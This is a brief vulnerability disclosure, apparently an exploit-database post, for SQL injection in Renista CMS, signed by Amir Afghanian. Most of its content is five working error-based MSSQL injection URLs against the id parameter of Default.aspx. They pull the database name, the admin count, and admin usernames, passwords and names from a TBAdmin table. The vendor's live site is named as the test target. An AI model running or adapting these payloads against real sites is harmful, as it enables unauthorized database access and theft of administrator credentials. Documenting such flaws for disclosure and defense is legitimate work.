扫码分享
验证:
体验盒子Author:Amir Afghanian
Discovered by :Amir Afghanian
My Email: Www.hack.net@gmail.com
my Y!ID: Amir_Coder
My Home page : www.shabgard.org
My Nice name : TakFanar
============
Renista CMS BUG
Only For NOTIFICATION
==================
Test on CMS Owner site :http://www.rayaco.com
# db name :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,db_name())--
# cont user :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--
# username :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
# password :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
# name :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
========================
I tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .
Special thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...
Contact me : www.hack.net@gmail.com
体验盒子
